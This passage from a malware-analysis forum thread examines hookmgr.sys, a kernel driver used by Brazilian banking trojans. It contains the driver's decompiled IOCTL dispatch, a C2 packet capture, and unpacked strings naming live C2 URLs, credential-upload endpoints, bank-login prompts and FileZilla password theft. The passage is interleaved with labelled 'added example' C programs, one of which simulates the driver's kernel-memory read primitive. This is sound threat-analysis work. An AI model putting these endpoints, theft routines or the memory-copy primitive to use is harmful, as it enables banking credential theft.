        if ( dword_1301C )
        {
          buf[0] = dword_1301C;
          Irp->IoStatus.Information = 4;
          status = STATUS_SUCCESS;
        }
        else
        {
          status = 0xC000028C;
        }
        break;

/////////////////////////
      case 0x224014:   // same for PsGetCurrentThreadProcessId
////////////////////////
        if ( !dword_13020 )
          dword_13020 = sub_11040();               // MmGetSystemRoutineAddress(L"PsGetCurrentThreadProcessId")
        if ( dword_13020 )
        {
          buf[0] = dword_13020;
          Irp->IoStatus.Information = 4;
          status = STATUS_SUCCESS;
        }
        else
        {
          status = 0xC000028C;
        }
        break;

////////////////////
      default:
////////////////////
        status = STATUS_INVALID_DEVICE_REQUEST;                                    // 0xC0000010
        break;
    }
  }
///////////////
  else             // IRP_MJ_CREATE and IRP_MJ_CLOSE are routed here too by DriverEntry (0x784..0x7a2)
//////////////
  {
    status = STATUS_SUCCESS;
  }
  Irp->IoStatus.Status = status;                                                   // Irp+0x18
  IofCompleteRequest(Irp, IO_NO_INCREMENT);
  return STATUS_SUCCESS;
}
This will need someone better at Windows internals than myself :roll: and I don't want to speculate.
Please kindly help w/thanks. I have to go back to ELF/nix malware asap.
Attached are samples.
Attachments: 7z/infected (6.8 MiB)
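The hexdump above already carries everything needed to translate the file offsets in the dump into the virtual addresses the disassembly uses (0x410 -> 0x11010, 0x470 -> 0x11070, 0xb10 -> 0x11710). As an added example, not part of the post, the C program below reads the section table out of those header bytes and does that mapping. DOS_HEADER_HEX and NT_HEADERS_HEX are transcribed from the dump (0x00..0x3F and 0xC8..0x287); the DOS stub in between is left zero-filled because nothing below reads it.

```c
/* Added example: section-table parsing of the hookmgr.sys header bytes shown above.
 * Not code from the post or the malware; the hex is transcribed from the dump. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

static const char DOS_HEADER_HEX[] =        /* file offset 0x00..0x3F, e_lfanew at 0x3C */
    "4d5a9000 03000000 04000000 ffff0000 b8000000 00000000 40000000 00000000"
    "00000000 00000000 00000000 00000000 00000000 00000000 00000000 c8000000";

static const char NT_HEADERS_HEX[] =        /* file offset 0xC8..0x287: PE signature, COFF + optional header, 5 section headers */
    "50450000 4c010500 15525a56 00000000 00000000 e0000201 0b010900 000c0000"
    "00060000 00000000 3e400000 00100000 00200000 00000100 00100000 00020000"
    "06000100 06000100 06000100 00000000 00600000 00040000 52780000 01000000"
    "00000400 00100000 00001000 00100000 00000000 10000000 00000000 00000000"
    "50400000 28000000 00000000 00000000 00000000 00000000 00000000 00000000"
    "00500000 94000000 40200000 1c000000 00000000 00000000 00000000 00000000"
    "00000000 00000000 60200000 40000000 00000000 00000000 00200000 34000000"
    "00000000 00000000 00000000 00000000 00000000 00000000 2e746578 74000000"
    "30080000 00100000 000a0000 00040000 00000000 00000000 00000000 20000068"
    "2e726461 74610000 34010000 00200000 00020000 000e0000 00000000 00000000"
    "00000000 40000048 2e646174 61000000 38000000 00300000 00020000 00100000"
    "00000000 00000000 00000000 400000c8 494e4954 00000000 90010000 00400000"
    "00020000 00120000 00000000 00000000 00000000 200000e2 2e72656c 6f630000"
    "b6000000 00500000 00020000 00140000 00000000 00000000 00000000 40000042";

#define HDR_SIZE 0x288
static uint8_t hdr[HDR_SIZE];               /* rebuilt header image, DOS stub left as zeros */

static int hexval(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;                              /* spaces are skipped */
}
static void hex_into(const char *hex, uint8_t *dst)
{
    int hi = -1;
    for (; *hex; hex++) {
        int v = hexval(*hex);
        if (v < 0) continue;
        if (hi < 0) hi = v; else { *dst++ = (uint8_t)(hi << 4 | v); hi = -1; }
    }
}
static uint32_t le32(const uint8_t *p) { return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }
static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }

/* builds the header image on first use and returns a pointer to the "PE\0\0" signature */
static const uint8_t *nt_headers(void)
{
    if (hdr[0] != 'M') { hex_into(DOS_HEADER_HEX, hdr); hex_into(NT_HEADERS_HEX, hdr + 0xC8); }
    uint32_t pe = le32(hdr + 0x3C);         /* e_lfanew */
    return memcmp(hdr + pe, "PE\0\0", 4) == 0 ? hdr + pe : NULL;
}

typedef struct { char name[9]; uint32_t vsize, va, rawsize, rawptr, chars; } section_t;

static int read_sections(section_t *out, int max)     /* returns the number of sections copied */
{
    const uint8_t *pe = nt_headers();
    if (!pe) return 0;
    int n = le16(pe + 6);                                  /* FileHeader.NumberOfSections */
    const uint8_t *sh = pe + 0x18 + le16(pe + 0x14);       /* section table follows the optional header */
    for (int i = 0; i < n && i < max; i++, sh += 0x28) {
        memcpy(out[i].name, sh, 8); out[i].name[8] = '\0';
        out[i].vsize = le32(sh + 0x08); out[i].va = le32(sh + 0x0C);
        out[i].rawsize = le32(sh + 0x10); out[i].rawptr = le32(sh + 0x14);
        out[i].chars = le32(sh + 0x24);
    }
    return n < max ? n : max;
}

static uint32_t image_base(void)     { const uint8_t *pe = nt_headers(); return pe ? le32(pe + 0x18 + 0x1C) : 0; }
static uint32_t entry_point_va(void) { const uint8_t *pe = nt_headers(); return pe ? image_base() + le32(pe + 0x18 + 0x10) : 0; }

/* file offset -> VA through the section that owns the raw data; 0 when no section does */
static uint32_t file_off_to_va(uint32_t off)
{
    section_t s[16]; int n = read_sections(s, 16);
    for (int i = 0; i < n; i++)
        if (off >= s[i].rawptr && off < s[i].rawptr + s[i].rawsize)
            return image_base() + s[i].va + (off - s[i].rawptr);
    return 0;
}
/* name of the section a VA falls in; "" when none */
static const char *va_section_name(uint32_t va)
{
    static section_t s[16]; int n = read_sections(s, 16);
    for (int i = 0; i < n; i++)
        if (va >= image_base() + s[i].va && va < image_base() + s[i].va + s[i].vsize) return s[i].name;
    return "";
}

int main(void)
{
    section_t s[16]; int n = read_sections(s, 16);
    for (int i = 0; i < n; i++)
        printf("%-8s va=%05x vsize=%04x raw=%04x+%04x chars=%08x\n", s[i].name, s[i].va, s[i].vsize, s[i].rawptr, s[i].rawsize, s[i].chars);
    printf("entry point %#x in %s\n", entry_point_va(), va_section_name(entry_point_va()));
    printf("file 0x410 -> %#x, file 0x470 -> %#x, file 0xb10 -> %#x\n", file_off_to_va(0x410), file_off_to_va(0x470), file_off_to_va(0xB10));
    return 0;
}
```

The same lookup shows that the entry point 0x1403e sits in INIT, the discardable section that only needs to exist while DriverEntry runs, while the dispatch code and the strings the post annotates are in .text.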
 #27792  by EP_X0FF
 Sun Jan 31, 2016 9:07 am
This switch is part of the dispatch routine for control codes sent from user mode via DeviceIoControl. There are three commands, which copy memory and return pointers to PsGetCurrentThreadId and PsGetCurrentThreadProcessId to the user-mode caller.
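EP_X0FF's reading of the switch, worked through as an added example that is not code from the thread or from the driver: a user-space model of the dispatch routine at 0x11070, with the kernel replaced by a 64 KiB simulated address space (everything at or above KERNEL_BASE plays the role of kernel memory) and ProbeForWrite and MmGetSystemRoutineAddress replaced by stand-ins. The IOCTL values, the field offsets and the NTSTATUS values are the ones in the dump; the IOCTL_* names, the routine addresses and the STATUS_ROUTINE_NOT_FOUND name are assumptions of this example. It also decodes the three control codes into their CTL_CODE fields, which shows all three are METHOD_BUFFERED, consistent with the use of Irp->AssociatedIrp.SystemBuffer.

```c
/* Added example: model of hookmgr.sys's IRP_MJ_DEVICE_CONTROL dispatch. Not the driver's code. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define IRP_MJ_DEVICE_CONTROL          0x0E
#define IOCTL_HOOKMGR_COPY             0x224004u   /* {dst, src, len} -> memcpy        (names are ours) */
#define IOCTL_HOOKMGR_PSGETTHREADID    0x22400Cu   /* -> &PsGetCurrentThreadId */
#define IOCTL_HOOKMGR_PSGETTHREADPID   0x224014u   /* -> &PsGetCurrentThreadProcessId */

#define STATUS_SUCCESS                 0x00000000u
#define STATUS_ACCESS_VIOLATION        0xC0000005u  /* what ProbeForWrite raises for a kernel address */
#define STATUS_INVALID_DEVICE_REQUEST  0xC0000010u  /* default: case in the dump */
#define STATUS_BUFFER_TOO_SMALL        0xC0000023u  /* InputBufferLength < 0xC */
#define STATUS_ROUTINE_NOT_FOUND       0xC000028Cu  /* raw value from the dump; the name is ours */

/* CTL_CODE(DeviceType, Function, Method, Access) = DeviceType<<16 | Access<<14 | Function<<2 | Method */
typedef struct { unsigned device_type, access, function, method; } ctl_fields;
static ctl_fields decode_ctl_code(uint32_t code)
{
    ctl_fields f = { code >> 16, (code >> 14) & 3u, (code >> 2) & 0xFFFu, code & 3u };
    return f;
}

/* ---- simulated kernel: 32-bit addresses into a flat 64 KiB space ---- */
#define MEM_SIZE    0x10000u
#define KERNEL_BASE 0x8000u                 /* plays the role of MmUserProbeAddress */
static uint8_t  sim_mem[MEM_SIZE];
static uint32_t dword_1301C, dword_13020;   /* the driver's two cached routine addresses */

static uint32_t sim_MmGetSystemRoutineAddress(const char *name)   /* constructed addresses */
{
    if (!strcmp(name, "PsGetCurrentThreadId"))        return 0x8050A100u;
    if (!strcmp(name, "PsGetCurrentThreadProcessId")) return 0x8050A1C0u;
    return 0;
}
/* ProbeForWrite raises STATUS_ACCESS_VIOLATION unless [addr, addr+len) lies below MmUserProbeAddress */
static uint32_t sim_ProbeForWrite(uint32_t addr, uint32_t len)
{
    if (len == 0) return STATUS_SUCCESS;
    if (addr + len < addr || addr + len > KERNEL_BASE) return STATUS_ACCESS_VIOLATION;
    return STATUS_SUCCESS;
}

/* the IRP / IO_STACK_LOCATION fields the dispatch reads, plus the two it writes back */
typedef struct {
    uint8_t  major_function;     /* IO_STACK_LOCATION+0x00 */
    uint32_t input_length;       /* +0x08 Parameters.DeviceIoControl.InputBufferLength */
    uint32_t ioctl;              /* +0x0C Parameters.DeviceIoControl.IoControlCode */
    uint32_t system_buffer[3];   /* Irp->AssociatedIrp.SystemBuffer (METHOD_BUFFERED: in and out) */
    uint32_t status;             /* Irp->IoStatus.Status */
    uint32_t information;        /* Irp->IoStatus.Information */
} sim_irp;

static void return_routine(sim_irp *irp, uint32_t *cache, const char *name)
{
    if (!*cache) *cache = sim_MmGetSystemRoutineAddress(name);
    if (*cache) { irp->system_buffer[0] = *cache; irp->information = 4; irp->status = STATUS_SUCCESS; }
    else        irp->status = STATUS_ROUTINE_NOT_FOUND;
}

static void hookmgr_dispatch(sim_irp *irp)
{
    uint32_t *buf = irp->system_buffer;
    irp->information = 0;
    if (irp->major_function != IRP_MJ_DEVICE_CONTROL) { irp->status = STATUS_SUCCESS; return; }
    switch (irp->ioctl) {
    case IOCTL_HOOKMGR_COPY:
        if (irp->input_length < 0xC) { irp->status = STATUS_BUFFER_TOO_SMALL; break; }
        /* only the destination is probed; the source is never checked against MmUserProbeAddress */
        irp->status = sim_ProbeForWrite(buf[0], buf[2]);
        if (irp->status != STATUS_SUCCESS) break;             /* __except: status = exception code */
        if (buf[0] + buf[2] > MEM_SIZE || buf[1] + buf[2] > MEM_SIZE) {   /* unmapped: fault inside memcpy */
            irp->status = STATUS_ACCESS_VIOLATION; break;
        }
        memmove(&sim_mem[buf[0]], &sim_mem[buf[1]], buf[2]);  /* the driver calls memcpy */
        irp->status = STATUS_SUCCESS;
        break;
    case IOCTL_HOOKMGR_PSGETTHREADID:  return_routine(irp, &dword_1301C, "PsGetCurrentThreadId");        break;
    case IOCTL_HOOKMGR_PSGETTHREADPID: return_routine(irp, &dword_13020, "PsGetCurrentThreadProcessId"); break;
    default: irp->status = STATUS_INVALID_DEVICE_REQUEST; break;
    }
}

/* what a user-mode DeviceIoControl(h, ioctl, in, in_len, out, ...) on \\.\hookmgr would come back with */
static uint32_t send_ioctl(uint32_t ioctl, uint32_t a, uint32_t b, uint32_t c, uint32_t in_len, uint32_t *out)
{
    sim_irp irp = { IRP_MJ_DEVICE_CONTROL, in_len, ioctl, { a, b, c }, 0, 0 };
    hookmgr_dispatch(&irp);
    if (out) *out = irp.system_buffer[0];
    return irp.status;
}

/* plant a marker in "kernel" memory and pull it into a user buffer through the copy command */
static uint32_t demo_kernel_read(void)
{
    memcpy(&sim_mem[0x9000], "kernel-secret!!!", 16);
    memset(&sim_mem[0x1000], 0, 16);
    uint32_t st = send_ioctl(IOCTL_HOOKMGR_COPY, 0x1000, 0x9000, 16, 12, NULL);
    return st == STATUS_SUCCESS && memcmp(&sim_mem[0x1000], "kernel-secret!!!", 16) == 0 ? STATUS_SUCCESS : 0xFFFFFFFFu;
}

int main(void)
{
    uint32_t p = 0;
    ctl_fields f = decode_ctl_code(IOCTL_HOOKMGR_COPY);
    printf("0x%X: device 0x%X function %u method %u access %u\n", IOCTL_HOOKMGR_COPY, f.device_type, f.function, f.method, f.access);
    printf("kernel -> user copy: 0x%08X, user -> kernel copy: 0x%08X\n", demo_kernel_read(),
           send_ioctl(IOCTL_HOOKMGR_COPY, 0x9000, 0x1000, 16, 12, NULL));
    printf("PsGetCurrentThreadId: status 0x%08X ptr 0x%08X\n", send_ioctl(IOCTL_HOOKMGR_PSGETTHREADID, 0, 0, 0, 0, &p), p);
    return 0;
}
```

The model keeps the shape of the decompile: a destination in kernel space fails at the probe, a source in kernel space does not, and the two lookup commands hand back the resolved ntoskrnl addresses in the first dword of the buffer with Information = 4.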
 #27793  by unixfreaxjp
 Sun Jan 31, 2016 9:27 am
EP_X0FF wrote:This switch is part of the dispatch routine for control codes sent from user mode via DeviceIoControl. There are three commands, which copy memory and return pointers to PsGetCurrentThreadId and PsGetCurrentThreadProcessId to the user-mode caller.
:) Thank you very much, this explains a lot about the nature of this threat.
 #27822  by unixfreaxjp
 Fri Feb 05, 2016 8:35 am
Same stealer crook, using this bin with the same driver drop:
[screenshot]
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\hookmgr
This time they stopped using .NET and switched to a Delphi-compiled PE, but used the same stuff: https://twitter.com/MalwareMustDie/stat ... 3540974592
[screenshot]
AutoIt3 pdb...
\PROGRAM FILES\AUTOIT3\AUTOITX\EXAMPLES\C++\AUTOITX.SLN
The CnC is pointing to abused AWS, their M.O.
Other similar behavior:
1. Big size to evade size-limit scanning
2. Starting many more child processes, exceeding the limit
3. Seeking Windows Mail... likely the same as before
4. that hookmgr.sys stuff
5. aiming at several processes for injection
Distributed from a .vbe malvertisement, with decoded source like this:
CNC {
     "Method" : "GET /fazendo/fix.php HTTP/1.1"
     "Host" : "54.207.104.36"
     "ip": "54.207.104.36",
     "hostname": "ec2-54-207-104-36.sa-east-1.compute.amazonaws.com",
     "city": "Sao Paulo",
     "region": "Sao Paulo",
     "country": "BR",
     "loc": "-23.5475,-46.6361",
     "org": "AS16509 Amazon.com, Inc."
     "prefix": "54.207.0.0/17 AMAZON-02, US"
     "traffic" :
2016-02-05 16:05:29.480173 IP MMD-CHECK > ec2-54-207-104-36.sa-east-1.compute.amazonaws.com.http: Flags [S], seq 547742150, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2016-02-05 16:05:29.480209 IP ec2-54-207-104-36.sa-east-1.compute.amazonaws.com.http > MMD-CHECK: Flags [S.], seq 3627243628, ack 547742151, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
2016-02-05 16:05:29.480296 IP MMD-CHECK > ec2-54-207-104-36.sa-east-1.compute.amazonaws.com.http: Flags [.], ack 1, win 256, length 0
2016-02-05 16:05:29.480665 IP MMD-CHECK > ec2-54-207-104-36.sa-east-1.compute.amazonaws.com.http: Flags [P.], seq 1:320, ack 1, win 256, length 319
        0x0000:  0a00 2700 0000 0602 2710 4c03 0800 4500  ..'.....'.L...E.
        0x0010:  0167 7c29 4000 8006 1cc1 c0a8 010b 36cf  .g|)@.........6.
        0x0020:  6824 c016 0050 20a5 e1c7 d833 586d 5018  h$...P.....3XmP.
        0x0030:  0100 761c 0000 4745 5420 2f66 617a 656e  ..v...GET./fazen
        0x0040:  646f 2f66 6978 2e70 6870 2048 5454 502f  do/fix.php.HTTP/
        0x0050:  312e 310d 0a43 6f6e 7465 6e74 2d54 7970  1.1..Content-Typ
        0x0060:  653a 2061 7070 6c69 6361 7469 6f6e 2f78  e:.application/x
        0x0070:  2d77 7777 2d66 6f72 6d2d 7572 6c65 6e63  -www-form-urlenc
        0x0080:  6f64 6564 0d0a 4361 6368 652d 636f 6e74  oded..Cache-cont
        0x0090:  726f 6c3a 206e 6f2d 6361 6368 650d 0a50  rol:.no-cache..P
        0x00a0:  7261 676d 613a 206e 6f2d 6361 6368 650d  ragma:.no-cache.
        0x00b0:  0a48 6f73 743a 2035 342e 3230 372e 3130  .Host:.54.207.10
        0x00c0:  342e 3336 0d0a 4163 6365 7074 3a20 7465  4.36..Accept:.te
Interesting:
==TaaT==Taa
Sample:
PE https://www.virustotal.com/en/file/0bb0 ... /analysis/
SYS https://www.virustotal.com/en/file/e547 ... /analysis/
Attachments: 7z/infected (5.25 MiB)
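The PSH packet in the capture above is printed as a raw Ethernet frame. As an added example, not part of the post, the C program below walks that frame (Ethernet, IPv4, TCP) down to the HTTP request and pulls out the fields a triage note needs: endpoints, TCP flags, the request line and the Host header. FRAME is transcribed from the post's hexdump, which stops after "Accept: te", so the capture is shorter than the 319-byte payload the IP total length announces and the parser has to report that rather than assume a complete request.

```c
/* Added example: decode the tcpdump frame from the post into an HTTP request summary. Not from the post. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

static const uint8_t FRAME[] = {   /* bytes 0x0000..0x00CF as printed above, capture cut off there */
    0x0a,0x00,0x27,0x00,0x00,0x00,0x06,0x02,0x27,0x10,0x4c,0x03,0x08,0x00,0x45,0x00,
    0x01,0x67,0x7c,0x29,0x40,0x00,0x80,0x06,0x1c,0xc1,0xc0,0xa8,0x01,0x0b,0x36,0xcf,
    0x68,0x24,0xc0,0x16,0x00,0x50,0x20,0xa5,0xe1,0xc7,0xd8,0x33,0x58,0x6d,0x50,0x18,
    0x01,0x00,0x76,0x1c,0x00,0x00,0x47,0x45,0x54,0x20,0x2f,0x66,0x61,0x7a,0x65,0x6e,
    0x64,0x6f,0x2f,0x66,0x69,0x78,0x2e,0x70,0x68,0x70,0x20,0x48,0x54,0x54,0x50,0x2f,
    0x31,0x2e,0x31,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,
    0x65,0x3a,0x20,0x61,0x70,0x70,0x6c,0x69,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2f,0x78,
    0x2d,0x77,0x77,0x77,0x2d,0x66,0x6f,0x72,0x6d,0x2d,0x75,0x72,0x6c,0x65,0x6e,0x63,
    0x6f,0x64,0x65,0x64,0x0d,0x0a,0x43,0x61,0x63,0x68,0x65,0x2d,0x63,0x6f,0x6e,0x74,
    0x72,0x6f,0x6c,0x3a,0x20,0x6e,0x6f,0x2d,0x63,0x61,0x63,0x68,0x65,0x0d,0x0a,0x50,
    0x72,0x61,0x67,0x6d,0x61,0x3a,0x20,0x6e,0x6f,0x2d,0x63,0x61,0x63,0x68,0x65,0x0d,
    0x0a,0x48,0x6f,0x73,0x74,0x3a,0x20,0x35,0x34,0x2e,0x32,0x30,0x37,0x2e,0x31,0x30,
    0x34,0x2e,0x33,0x36,0x0d,0x0a,0x41,0x63,0x63,0x65,0x70,0x74,0x3a,0x20,0x74,0x65,
};

typedef struct {
    char     src_ip[16], dst_ip[16];
    uint16_t sport, dport;
    uint8_t  tcp_flags;
    size_t   payload_total;      /* from the IP total length */
    size_t   payload_captured;   /* what the dump actually contains */
    char     request_line[96];
    char     host[64];
} http_summary;

static void ip4_to_str(const uint8_t *p, char *out) { snprintf(out, 16, "%u.%u.%u.%u", p[0], p[1], p[2], p[3]); }

static int starts_with(const char *p, const char *end, const char *lit)
{
    size_t n = strlen(lit);
    return (size_t)(end - p) >= n && memcmp(p, lit, n) == 0;
}
/* copy up to "\r\n" or the end of the captured bytes, whichever comes first */
static void copy_line(const char *s, const char *end, char *out, size_t cap)
{
    size_t n = 0;
    while (s + n < end && n + 1 < cap && !(s[n] == '\r' && s + n + 1 < end && s[n + 1] == '\n')) n++;
    memcpy(out, s, n); out[n] = '\0';
}

/* 0 on success, negative when the frame is not an IPv4/TCP segment carrying an HTTP request */
static int summarize_http(const uint8_t *f, size_t len, http_summary *o)
{
    memset(o, 0, sizeof *o);
    if (len < 14 + 20 || f[12] != 0x08 || f[13] != 0x00) return -1;          /* EtherType must be IPv4 */
    const uint8_t *ip = f + 14;
    size_t ihl = (ip[0] & 0x0F) * 4, ip_total = (size_t)(ip[2] << 8 | ip[3]);
    if ((ip[0] >> 4) != 4 || ihl < 20 || ip[9] != 6 || len < 14 + ihl + 20) return -2;  /* protocol 6 = TCP */
    ip4_to_str(ip + 12, o->src_ip); ip4_to_str(ip + 16, o->dst_ip);
    const uint8_t *tcp = ip + ihl;
    size_t doff = (tcp[12] >> 4) * 4;
    o->sport = (uint16_t)(tcp[0] << 8 | tcp[1]); o->dport = (uint16_t)(tcp[2] << 8 | tcp[3]);
    o->tcp_flags = tcp[13] & 0x3F;
    if (doff < 20 || ip_total < ihl + doff || len < 14 + ihl + doff) return -3;
    o->payload_total = ip_total - ihl - doff;
    const char *p = (const char *)tcp + doff, *end = (const char *)f + len;
    o->payload_captured = (size_t)(end - p);
    if (!starts_with(p, end, "GET ") && !starts_with(p, end, "POST ")) return -4;
    copy_line(p, end, o->request_line, sizeof o->request_line);
    /* Host: must start a line; in a truncated capture it may be missing or cut short */
    for (const char *h = p; h + 6 <= end; h++)
        if (memcmp(h, "Host: ", 6) == 0 && (h == p || (h - p >= 2 && h[-2] == '\r' && h[-1] == '\n'))) {
            copy_line(h + 6, end, o->host, sizeof o->host);
            break;
        }
    return 0;
}

static int summarize_frame(http_summary *o) { return summarize_http(FRAME, sizeof FRAME, o); }

int main(void)
{
    http_summary s;
    if (summarize_frame(&s) != 0) return 1;
    printf("%s:%u -> %s:%u flags 0x%02x\n%s\nHost: %s\npayload %zu of %zu bytes captured\n",
           s.src_ip, s.sport, s.dst_ip, s.dport, s.tcp_flags, s.request_line, s.host, s.payload_captured, s.payload_total);
    return 0;
}
```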
 #27837  by iShare2
 Mon Feb 08, 2016 10:28 pm
The .NET file you mentioned earlier is just a wrapper (shell) for the actual malware.
The unpacked file would be EE0405369DE26A3E86CC3A754F4155F7 (see the attachment), which is compiled with Delphi.

If you look into the Delphi binary's resources, you can extract the following payloads from the RCData section:

LIB64
Internal Name: tokip.exe
f0d67163a9dc5d6ba02b0932d9a20a82

LIBH32
32Bit variant of dropped hookmgr.sys driver
Config String: c:\users\admin\appdata\roaming\x86\objchk_win7_x86\i386\hookmgr.pdb
a33adeec70904f792dfcf8492358fe6e

LIBH64
64Bit variant of dropped hookmgr.sys driver
Config String: c:\users\admin\appdata\roaming\x64\objchk_wlh_amd64\amd64\hookmgr.pdb
01dd9fac90d6e279df1bd5d26ea18239

This malware is a variant of the well-known Brazilian banking Trojan Banbra, targeting almost 60 different entities.
 #27896  by benkow_
 Thu Feb 18, 2016 9:05 am
I don't know if it's the same family, but here is another Brazilian banker trojan:
288781db1e7741fda33897a42457510a - https://www.virustotal.com/en/file/b2db ... 455784542/
https://malwr.com/analysis/YTMwMTIxMzEy ... hjZWZjZWI/

Some unpacked strings:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; GTB5; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Maxthon; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
http://shhoptime.com.br/js/up.txt
rundll32.exe
http://shhoptime.com.br/js/get
http://shhoptime.com.br/js/postUP.php?o=
http://shhoptime.com.br/js/postUP.php?o=ERROR
remotejs.ddns.net
\Software\Microsoft\Windows\CurrentVersion\Run
rundll32.exe
whitehouse
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; GTB5; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Maxthon; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
http://testessss.agropecuaria.ws/count/getftp.php?ftp1=
http://shhoptime.com.br/js/getftp.php?ftp1=
&ftp2=
&ftp3=
&ftp4=
&ftp5=
Email/Loguin: 
Senha: 
Token 2
 passo:
Assinatura Eletronica: 
SELECT * FROM AntiVirusProduct
Celular Token: 
Senha Certificado: 
AntiVirusProduct
AntiSpywareProduct
FirewallProduct
SecurityCenter
SecurityCenter2
PIN de segurança:
Banco Bradesco | Pessoa Física, Exclusive, Prime e Private
blockdesco
Bradesco PF
Banco Bradesco [Seguran
Banco Bradesco | Pessoa Física, Exclusive, Prime e Private - Google Chrome
Banco Bradesco | Pessoa Física, Exclusive, Prime e Private - Mozilla Firefox
Banco Bradesco | Pessoa Jurídica
Bradesco PJ
Banco Bradesco | Pessoa Jurídica - Google Chrome
Banco Bradesco | Pessoa Jurídica - Mozilla Firefox
Bradesco Prime
Bradesco Prime - Google Chrome
Bradesco Prime - Mozilla Firefox
Mercado Bitcoin - Participe da tecnologia mais inovadora do mundo
blockbtc
Mercado BitCoin
Mercado Bitcoin [Seguran
Mercado Bitcoin - Participe da tecnologia mais inovadora do mundo - Google Chrome
Mercado Bitcoin - Participe da tecnologia mais inovadora do mundo - Mozilla Firefox
Carteira Bitcoin - Seja o Seu Próprio Banco - Blockchain.info
BlockChain
Blockchain [Seguran
Carteira Bitcoin - Seja o Seu Próprio Banco - Blockchain.info - Google Chrome
Carteira Bitcoin - Seja o Seu Próprio Banco - Blockchain.info - Mozilla Firefox
My Wallet - Be Your Own Bank - Blockchain.info
My Wallet - Be Your Own Bank - Blockchain.info - Google Chrome
My Wallet - Be Your Own Bank - Blockchain.info - Mozilla Firefox
<|SocketMain|>
<<|
<|OK|>
<|Info|>
<|>
1.5
<|PING|>
<|PONG|>
<|REQUESTKEYBOARD|>
<|REQUESTNAVEGADOR|>
<|REQUESTDESKTOP|>
<|first|>
reicxao
blockbb
blockita
blockcef
blockdesco
blockhs
blocksanta
blockbtc
blockchain
unblockbb
unblockita
unblockcef
unblockdesco
unblockhs
unblocksanta
unblockbtc
unblockchain
pedinfo
<|Close|>
<|MousePos|>
<|MouseLD|>
<|MouseLU|>
<|MouseRD|>
<|MouseRU|>
STARTFAKE
CEF
HSBC
ITAU
DESCO
SANTA
BIT
BLOCKCHAIN
santatab
smstoken
santaass
santapjtoken
asscef
itafs6
itafnasc
itatabela
itaToken
itaSMSTok
hsbccpf
TecladoHsbc
SeloHsbc
caracteres
senhaletra
Finalizahsbc
FimHsbc
descotab
descoToken
descoTokenCel
descscerti
s6bb
s86bb
scertibb
scontagf
s4bb
final
<|okok|>
<|gets|>
<|TAMANHO|>
<|Desktop|>
<|KEYBOARD|>
BACKSPACE
BKSP
BREAK
CAPSLOCK
CLEAR
DEL
DELETE
DOWN
END
ENTER
ESC
ESCAPE
F10
F11
F12
F13
F14
F15
F16
HELP
HOME
INS
LEFT
NUMLOCK
PGDN
PGUP
PRTSC
RIGHT
SCROLLLOCK
{DOWN}
{UP}
{LEFT}
{RIGHT}
{DEL}
{BS}
{TAB}
{ENTER}
.bat
Erase "%s"
If exist "%s" Goto 1
Open
blockbb
blockcef
Caixa
blockita
Itau
blocksanta
Santander
blockdesco
Bradesco
blockhs
HSBC
blockbtc
Mercado Bitcoin
blockchain
Blockchain
Sem Bloqueio
ZYYd
Q,h
ZYYd
\FileZilla\sitemanager.xml
<Host>
</Host>
<User>
</User>
<Pass encoding="base64">
</Pass>
<Port>
</Port>
Host: 
 Port: 
 User: 
 Pass: 
\FileZilla\recentservers.xml
Host:_
_Port:_
_User:_
_Pass_
NOT FOUND
SeShutdownPrivilege
C&C
http://shhoptime.com.br/js/post.php?u=
http://shhoptime.com.br/js/up.txt -> Version
[screenshot]
77 bots today
 #27919  by unixfreaxjp
 Tue Feb 23, 2016 5:27 am
benkow_ wrote:I don't know if it's the same family, but here is another Brazilian banker trojan
If it uses "hookmgr.sys" then it is the same actor/threat/variant. That driver is an interesting API to grab memory, as explained in this report: http://www.kernelmode.info/forum/viewto ... 217#p27792
The bad guy will wrap its payload into anything. This report correctly explains the situation: http://www.kernelmode.info/forum/viewto ... 217#p27837
and can be used for further reference. Bankers for sure, not cheap code.
 #27948  by iShare2
 Thu Feb 25, 2016 7:33 pm
Benkow

After removing the initial VB6 wrapper and the secondary UPX layer, the unpacked malware would be 524B3CDF55A52A4FCE10040CEA36A848 (see the attachment).
The malware, which is also coded in Delphi, matches signatures of Banload aka Delf, yet another Brazilian banker.
All the C2 info and main strings are stored in plain text.
Attachments: (2.06 MiB)
 #29262  by markusg
 Fri Sep 23, 2016 4:49 pm
SHA256:
c4dcbc877b4a21dd81ff3f3b559f64f11e8555246edad4a58d43891108e5306b
Filename:
Aviões do Forró - Vou Deixar Ele Ir - [Baixar CD] Aviões Do Forr...
https://virustotal.com/de/file/c4dcbc87 ... 474647274/